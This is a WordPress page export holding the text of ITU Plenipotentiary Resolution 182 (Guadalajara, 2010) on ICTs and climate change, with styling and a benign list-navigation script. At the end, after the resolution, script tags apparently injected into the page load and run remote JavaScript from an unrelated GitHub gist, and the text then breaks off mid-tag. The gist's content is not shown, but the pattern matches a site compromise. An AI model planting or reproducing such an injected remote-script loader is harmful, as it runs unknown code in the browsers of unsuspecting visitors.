{"id":674,"date":"2013-06-18T21:33:41","date_gmt":"2013-06-19T01:33:41","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=674"},"modified":"2015-06-29T23:49:23","modified_gmt":"2015-06-30T03:49:23","slug":"pp_182","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2010\/pp_182\/","title":{"rendered":"PP Resolution 182"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">PP RESOLUTION  182  (Guadalajara, 2010)<\/span><\/h3>\n<h4><span style=\"\">The role of telecommunications\/information and communication technologies in regard to climate change and the protection of the environment<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 136 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, on the use of telecommunications and information and communication technologies (ICTs) for monitoring and management in emergency and disaster situations for early warning, prevention, mitigation and relief;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        relevant resolutions of world radiocommunication conferences and radiocommunication assemblies, such as Resolution 646 (WRC-03), on public protection and disaster relief; Resolution 644 (Rev. WRC-07), on radiocommunication resources for early warning, disaster mitigation and relief operation; or Resolution 673 (WRC-07), on the use of radiocommunication for Earth observation, in collaboration with the World Meteorological Organization (WMO);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 73 (Johannesburg, 2008) of the World Telecommunication Standardization Assembly, on ICTs and climate change, which resulted from the successful work of the focus group created in 2007 by the Telecommunication Standardization Advisory Group to identify the role of the ITU Telecommunication Standardization Sector (ITU-T) in regard to this issue, and was adopted in response to the needs identified in the relevant contributions to WTSA-08 by the ITU regional groups;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        Resolution 66 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC), on ICT and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        Resolution 54 (Rev. Hyderabad, 2010) of WTDC, on ICT applications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        Resolution 1307 adopted by the ITU Council at its 2009 session, on ICTs and climate change,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        \u00a7 20 of Action Line C7 (E-environment) of the Geneva Plan of Action of the World Summit on the Information Society (Geneva, 2003), calling for the establishment of monitoring systems using ICTs to forecast and monitor the impact of natural and man-made disasters, particularly in developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Opinion 3 of the 2009 World Telecommunication Policy Forum, on ICT and the environment, which recognizes that telecommunications\/ICTs can make a substantial contribution to mitigating and adapting to the effects of climate change, and calls for formulating future inventions and efforts for effectively addressing climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        the outcomes of the United Nations Climate Change conferences held in Indonesia in December 2007 and in Copenhagen in December 2009;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the Nairobi Declaration on the Environmentally Sound Management of Electrical and Electronic Waste, and the adoption by the Ninth Conference of the Parties to the Basel Convention of the Work Plan for the Environmentally Sound Management of E-waste, focusing on the needs of developing countries and countries with economies in transition,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the United Nations Intergovernmental Panel on Climate Change (IPCC) estimated that global greenhouse gas (GHG) emissions had risen by more than 70 per cent since 1970, having an effect on global warming, changing weather patterns, rising sea-levels, desertification, shrinking ice cover and other long-term effects;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that climate change is acknowledged as a potential threat to all countries and needs a global response;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that the consequences of developing countries&#8217; lack of preparation in the past have recently come to light, and that these countries will be exposed to incalculable dangers and considerable losses, including the consequences of rising sea levels for many coastal areas in developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        Programme 5 of the Hyderabad Action Plan for least developed countries, countries in special need (small island developing states, low-lying coastal countries and landlocked developing countries), emergency telecommunications and climate-change adaptation,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that telecommunications\/ICTs play an important role in protecting the environment and in promoting innovative and sustainable development activities at low risk to the environment;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the role of telecommunications\/ICTs in tackling the challenge of climate change encompasses a wide array of activities, including, but not limited to: the promotion of telecommunications\/ICTs as alternatives to other technologies that consume more energy; the development of energy-efficient devices, applications and networks; the development of energy-efficient working methods; the implementation of satellite and ground-based remote-sensing platforms for environmental observation, including weather monitoring; and the use of telecommunications\/ICTs to warn the public of dangerous weather events and provide communication support for governmental and non-governmental organization aid providers to contribute to the reduction of GHG emissions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that remote-sensing applications on board satellites and other radiocommunication systems are important tools for climate monitoring, environmental observation, disaster prediction, detection of illegal deforestation, and detection and mitigation of the negative effects of climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the role ITU can play in promoting the use of ICTs to mitigate climate-change effects, and that the strategic plan for the Union for 2012-2015 gives clear priority to combating climate change using ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that the use of telecommunications\/ICTs provides increased opportunities to reduce GHG emissions generated by non-ICT sectors through the utilization of telecommunications\/ICTs in ways that replace services or increase efficiency of the sectors concerned,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">aware<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that telecommunications\/ICTs also contribute to emissions of GHG, a contribution which, although relatively small, will grow with the increased use of telecommunications\/ICTs, and that the necessary priority must be given to reducing GHG emissions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that developing countries face additional challenges in addressing the effects of climate change, including natural disasters related to climate change,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">bearing in mind<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that countries have ratified the United Nations Framework Convention on Climate Change (UNFCCC) Protocol and have committed to reduce their emission levels of GHG to targets that are mainly set below their 1990 levels;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the countries that have submitted plans in response to the Copenhagen Accord have specified which steps they are prepared to take to reduce their carbon intensity in the current decade,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the current ITU-T Study Group 5 is the lead ITU-T study group responsible for studies on methodologies for evaluating telecommunication\/ICT effects on climate change, for publishing guidelines for using ICTs in an eco-friendly way, for studying energy efficiency of the power feeding systems, for studying ICT environmental aspects of electromagnetic phenomena, and for studying, assessing and analysing safe, low-cost social recirculation of telecommunication\/ICT equipment through recycling and reuse;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Question 24\/2 of Study Group 2 of the ITU Telecommunication Development Sector (ITU-D), on ICTs and climate change, adopted by WTDC-10;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that ITU recommendations that focus on energy-saving systems and applications can play a critical role in the development of telecommunications\/ ICTs, by promoting the adoption of recommendations for enhancing the use of telecommunications\/ICTs to serve as an effective cross-cutting tool to measure and reduce GHG emissions across economic and social activities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the leadership of the ITU Radiocommunication Sector (ITU-R), in collaboration with the ITU membership, in continuing to support studies on the use of radiocommunication systems, including remote-sensing applications, to improve climate monitoring and disaster prediction, detection and relief;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that there are other international bodies that are working on climate-change issues, including UNFCCC, and that ITU should collaborate, within its mandate, with those entities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        that several countries have committed to a 20 per cent reduction in GHG emissions both in the ICT sector and in the use of ICTs in other sectors by 2020, against 1990 levels,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"col\" style=\"\"><span style=\"\">that ITU, within its mandate and in collaboration with other organizations, will demonstrate its leadership in applying telecommunications\/ICTs to address the causes and effects of climate change through the following:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue and further develop ITU activities on telecommunications\/ICTs and climate change in order to contribute to the wider global efforts being made by the United Nations;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to encourage energy efficiency of telecommunications\/ICTs in order to reduce the GHG emissions produced by the telecommunication\/ICT sector;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3         to encourage the telecommunication\/ICT sector to contribute, through its own improvement of energy efficiency and in the use of ICTs in other parts of the economy, to an annual reduction in GHG emissions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to report on the level that the ICT sector has contributed to the reduction of GHG emissions in other sectors through a reduction of their energy consumption by applying ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to promote awareness of the environmental issues associated with telecommunication\/ICT equipment design and encourage energy efficiency and the use of materials in the design and fabrication of telecommunication\/ICT equipment in order to promote a clean and safe environment;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to include, as a priority, assistance to developing countries so as to strengthen their human and institutional capacity in promoting the use of telecommunications\/ICTs to tackle climate change, as well as in areas such as the need for communities to adapt to climate change, as a key element of disaster-management planning,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Secretary-General, in collaboration with the Directors of the three Bureaux<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to formulate a plan of action for the role of ITU, taking into account all relevant ITU resolutions, in conjunction with other relevant expert bodies\/groups, and taking into account the specific mandate of the three ITU Sectors;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to ensure that the relevant ITU study groups responsible for ICTs and climate change implement the plan of action referred to in instructs the Secretary-General, in collaboration with the Directors of the three Bureaux 1 above;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to liaise with other relevant organizations in order to avoid duplication of work and optimize the use of resources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to ensure that ITU organizes workshops, seminars and training courses in developing countries at the regional level for the purpose of raising awareness and identifying key issues in order to generate best-practice guidelines;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to continue taking appropriate measures within the Union to contribute to the reduction of the carbon footprint (e.g. paperless meetings, videoconferences, etc.);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to report annually to the Council and to the next plenipotentiary conference on the progress made by ITU on implementation of this resolution;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to submit this resolution and other appropriate outcomes of the ITU activities to meetings of relevant organizations, including UNFCCC, in order to reiterate the Union&#8217;s commitment to sustainable global growth; and to ensure recognition of the importance of telecommunications\/ICTs in mitigation and adaptation efforts as well as the critical role of ITU in this regard,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Directors of the three Bureaux, within the purview of their mandates<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue the development of best practices and guidelines that will assist governments in the development of policy measures that could be used to support the ICT sector in reducing GHG emissions and promoting ICTs in other sectors;<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">2        to help in the promotion of research and development:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">&#8211;        to improve the energy efficiency of ICT equipment<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">&#8211;        to measure climate change<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">&#8211;        to mitigate the effects of climate change<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">&#8211;        to adapt to the effects of climate change,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"exp\" style=\"\"><span style=\"\">1        to assist the lead ITU-T study group on ICTs and climate change (currently ITU-T Study Group 5), in collaboration with other bodies, in the development of methodologies to assess:<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">i)        the level of energy efficiency in the ICT sector and the application of telecommunications\/ICTs in non-ICT sectors;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii)        the complete lifecycle GHG emissions of telecommunication\/ICT equipment, in collaboration with other relevant bodies, in order to establish best practice in the sector against an agreed set of metrics to enable the benefits of reuse, refurbishment and recycling to be quantified in order to help achieve reductions in GHG emissions both in the telecommunication\/ICT sector and in the use of ICTs in other sectors;<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to promote the work of ITU and cooperate with United Nations entities and others in activities related to climate change, working towards a progressive and measurable reduction in energy consumption and GHG emissions throughout the lifecycle of telecommunication\/ICT equipment;<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">3        to utilize the current Joint Coordination Activity on ICT and on climate change in specialist and specific discussions with other industries, drawing upon the expertise existing in other forums, industrial sectors (and their relevant forums) and academia in order to:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">i)        demonstrate ITU leadership in GHG reductions and energy savings in the ICT sector;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii)        ensure that ITU actively leads in the application of ICTs in other industries and contributes to the reduction in GHG emissions,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States, Sector Members and Associates<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue to contribute actively to ITU on ICTs and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2         to continue or initiate public and private programmes that include ICTs and climate change, giving due consideration to relevant ITU initiatives;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3         to support and contribute to the wider United Nations process on climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to take necessary measures to reduce the effects of climate change by developing and using more energy-efficient ICT devices, applications and networks and through the application of ICTs in other fields;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to promote recycling and reuse of telecommunication\/ICT equipment;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to continue to support the work of ITU-R in remote sensing (active and passive) for environmental observation and other radiocommunication systems that can be used to support climate monitoring, disaster prediction, alerting and response in accordance with relevant resolutions adopted by radiocommunication assemblies and world radiocommunication conferences.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' 